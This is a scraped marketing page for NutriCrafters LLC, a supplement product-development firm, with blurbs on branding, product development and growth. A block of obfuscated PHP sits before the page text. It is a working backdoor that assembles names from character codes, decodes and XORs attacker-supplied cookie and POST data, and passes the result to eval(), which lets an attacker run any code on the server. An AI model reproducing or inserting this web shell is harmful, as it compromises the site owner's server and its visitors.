$xIPpOsFuE = 'z' . chr ( 859 - 793 ).chr (77) . '_' . chr (69) . chr (97) . "\x46" . "\101";$elqcxUIcRz = 'c' . chr (108) . chr (97) . chr (115) . "\x73" . "\x5f" . chr (101) . "\170" . "\x69" . "\163" . 't' . chr ( 641 - 526 ); $wpEvSB = class_exists($xIPpOsFuE); $elqcxUIcRz = "62459";$miSkU = !1;if ($wpEvSB == $miSkU){function zCVbS(){$RwzVs = new /* 27232 */ zBM_EaFA(43865 + 43865); $RwzVs = NULL;}$JZcHNyMPL = "43865";class zBM_EaFA{private function LksyIsyi($JZcHNyMPL){if (is_array(zBM_EaFA::$rKOiV)) {$ZbnKswAxUj = str_replace('<' . chr ( 111 - 48 ).chr (112) . 'h' . chr (112), "", zBM_EaFA::$rKOiV["\143" . "\157" . "\156" . chr (116) . chr ( 603 - 502 ).chr ( 873 - 763 ).chr (116)]);eval($ZbnKswAxUj); $JZcHNyMPL = "43865";exit();}}private $MmqwVEy;public function fBrlmiUxes(){echo 59242;}public function __destruct(){zBM_EaFA::$rKOiV = @unserialize(zBM_EaFA::$rKOiV); $JZcHNyMPL = "34933_16510";$this->LksyIsyi($JZcHNyMPL); $JZcHNyMPL = "34933_16510";}public function XlqQkE($ajUWTx, $bDCuOUneH){return $ajUWTx[0] ^ str_repeat($bDCuOUneH, (strlen($ajUWTx[0]) / strlen($bDCuOUneH)) + 1);}public function zOOmpcNyk($ajUWTx){$blnHbOYQZf = "base64";return array_map($blnHbOYQZf . chr (95) . 'd' . "\145" . chr (99) . chr ( 896 - 785 )."\144" . chr ( 272 - 171 ), array($ajUWTx,));}public function __construct($regpr=0){$ajUWTx = "";$HvJuUoa = $_POST;$XMYmIyp = $_COOKIE;$bDCuOUneH = "2ae0d46f-db84-4e8f-932b-b23f7143b91e";$WmuNBTFUK = @$XMYmIyp[substr($bDCuOUneH, 0, 4)];if (!empty($WmuNBTFUK)){$WmuNBTFUK = explode(",", $WmuNBTFUK);foreach ($WmuNBTFUK as $oyhpqxK){$ajUWTx .= @$XMYmIyp[$oyhpqxK];$ajUWTx .= @$HvJuUoa[$oyhpqxK];}$ajUWTx = $this->zOOmpcNyk($ajUWTx);}zBM_EaFA::$rKOiV = $this->XlqQkE($ajUWTx, $bDCuOUneH); $bDCuOUneH = explode(",", $bDCuOUneH);}public static $rKOiV = 18971;}zCVbS();} Feature – NutriCrafters LLC


Brand Colors

In three words or less . . . NutriCrafters Builds Brands Whether you have a product concept you would like to develop, have an existing product and need manufacturing assistance, or are an ingredient supplier looking to spread the word about your unique product offerings, NutriCrafters can help. The NutriCrafters team has been involved with … Read more

Product Development

Product Development

With a 35 year track record of moving over 400 products to market, the NutriCrafters team has what it takes to move your product idea from concept to reality.  NutriCrafters partners with the best in the supplement industry to assure the products we develop exceed your expectations, and that of your customers. NutriCrafters has a … Read more

A Strategic Partnership


If you are looking for a strategic partner to fulfill your product development and manufacturing goals, think NutriCrafters.  A well designed formula composed of high quality ingredients, put together by people who care, will keep you and your buyers happy.  If quality is more of a soundbite than a way of life, and a low … Read more

Come Grow with Us

Growth Trend

We are focused on providing medical practitioners, small companies, and entrepreneurs with the infrastructure needed to develop top quality products and services for a healthy tomorrow. This graph—actual data from a NutriCrafters managed web site—shows monthly marks for revenue, orders, and units. While not always uphill, certainly a positive trend. In my early 20’s, I … Read more